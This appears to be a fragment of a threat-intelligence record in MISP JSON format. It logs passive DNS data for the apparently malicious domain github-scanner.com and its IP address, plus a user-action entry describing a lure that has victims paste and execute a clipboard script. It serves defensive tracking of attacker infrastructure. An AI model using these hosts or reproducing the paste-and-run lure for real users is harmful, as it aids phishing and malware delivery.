"uuid": "8d5c5d36-0492-46c2-97df-a70cfcdf04bd",
"ObjectReference": [
{
"comment": "",
"object_uuid": "8d5c5d36-0492-46c2-97df-a70cfcdf04bd",
"referenced_uuid": "3bf7a6e8-a3b2-4975-bf4c-cc2c90329a94",
"relationship_type": "describes",
"timestamp": "1726730850",
"uuid": "6ad41937-af4a-4d11-979b-09d51ebe786a"
}
],
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "count",
"timestamp": "1726727232",
"to_ids": false,
"type": "counter",
"uuid": "f1656c54-eb92-4b33-a008-e24b6b51bf7e",
"value": "3"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "origin",
"timestamp": "1726727232",
"to_ids": false,
"type": "text",
"uuid": "e6681e64-9d1b-4bd9-be23-80e1fb8584d8",
"value": "https://www.circl.lu/pdns/"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "time_first",
"timestamp": "1726727232",
"to_ids": false,
"type": "datetime",
"uuid": "b5539651-1ce5-469d-86e5-0c03758544c3",
"value": "2024-09-18T20:46:29+00:00"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "rrtype",
"timestamp": "1726727232",
"to_ids": false,
"type": "text",
"uuid": "726c8c6d-947a-421b-8771-4996e61b9be6",
"value": "SOA"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "rrname",
"timestamp": "1726727232",
"to_ids": false,
"type": "text",
"uuid": "74f3d184-1838-48bc-bff1-4bcfb3eecf8f",
"value": "cody.ns.cloudflare.com dns.cloudflare.com 2352168100 10000 2400 604800 1800"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "rdata",
"timestamp": "1726727232",
"to_ids": false,
"type": "text",
"uuid": "17d1b83b-2b50-4ffd-914f-fd436b5817c8",
"value": "github-scanner.com"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "time_last",
"timestamp": "1726727232",
"to_ids": false,
"type": "datetime",
"uuid": "0bc5f99a-63dc-419c-9afc-ef0270269239",
"value": "2024-09-19T00:21:56+00:00"
}
]
},
{
"comment": "github-scanner.com: Enriched via the circl_passivedns module",
"deleted": false,
"description": "Passive DNS records as expressed in draft-dulaunoy-dnsop-passive-dns-cof-07. See https://tools.ietf.org/id/draft-dulaunoy-dnsop-passive-dns-cof-07.html",
"meta-category": "network",
"name": "passive-dns",
"template_uuid": "b77b7b1c-66ab-4a41-8da4-83810f6d2d6c",
"template_version": "5",
"timestamp": "1726727232",
"uuid": "b53c8423-c8a7-4863-a01a-3e9eebcb199f",
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "count",
"timestamp": "1726727232",
"to_ids": false,
"type": "counter",
"uuid": "2d1bf529-44f6-4bd4-ac89-97f6bbffb7dd",
"value": "6"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "origin",
"timestamp": "1726727232",
"to_ids": false,
"type": "text",
"uuid": "dfb4bc4e-177b-4346-b8c4-16489de1f367",
"value": "https://www.circl.lu/pdns/"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "time_first",
"timestamp": "1726727232",
"to_ids": false,
"type": "datetime",
"uuid": "30c74f8c-0b9c-418f-8292-4ec681c94451",
"value": "2024-09-18T20:29:31+00:00"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "rrtype",
"timestamp": "1726727232",
"to_ids": false,
"type": "text",
"uuid": "a60bbba2-1d7b-4bbb-a4a1-075a75d5fe9e",
"value": "A"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "rrname",
"timestamp": "1726727232",
"to_ids": false,
"type": "text",
"uuid": "f7484977-e5cf-4cce-8a1d-aeb7d1de1813",
"value": "185.208.159.43"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "rdata",
"timestamp": "1726727233",
"to_ids": false,
"type": "text",
"uuid": "4b02653a-19de-44d8-87ac-3a6c51cea125",
"value": "github-scanner.com"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "time_last",
"timestamp": "1726727233",
"to_ids": false,
"type": "datetime",
"uuid": "7e65468d-c230-4c73-9bcb-498531b6ca8a",
"value": "2024-09-19T05:00:55+00:00"
}
]
},
{
"comment": "",
"deleted": false,
"description": "Represent an user action",
"meta-category": "misc",
"name": "user-action",
"template_uuid": "699dcf9d-2fa2-4200-a5cf-1d1e124e28c1",
"template_version": "1",
"timestamp": "1726730807",
"uuid": "8191b040-b2fe-4f2e-9dbd-9069d833a4e7",
"ObjectReference": [
{
"comment": "",
"object_uuid": "8191b040-b2fe-4f2e-9dbd-9069d833a4e7",
"referenced_uuid": "7b88da77-5001-4565-926e-965d55319a24",
"relationship_type": "executes",
"timestamp": "1726730781",
"uuid": "af312173-b3f6-4299-bc49-03a220ecf8db"
},
{
"comment": "",
"object_uuid": "8191b040-b2fe-4f2e-9dbd-9069d833a4e7",
"referenced_uuid": "a4e7b874-225e-4206-9cf8-f858854d4ca5",
"relationship_type": "executes",
"timestamp": "1726730807",
"uuid": "854b29e4-28cc-4ab0-8222-f47e252dc4ec"
}
],
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "action",
"timestamp": "1726730735",
"to_ids": false,
"type": "text",
"uuid": "5365bd91-b848-4155-8e0d-10d1f2c20bd6",
"value": "Execute"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "description",
"timestamp": "1726730735",
"to_ids": false,
"type": "text",
"uuid": "c191cff1-85f2-4469-ac94-e0901a794c3b",
"value": "Copy the paste buffer and execute the following script."
}
]
}
]
}
}
Reference in a new issue Copy permalink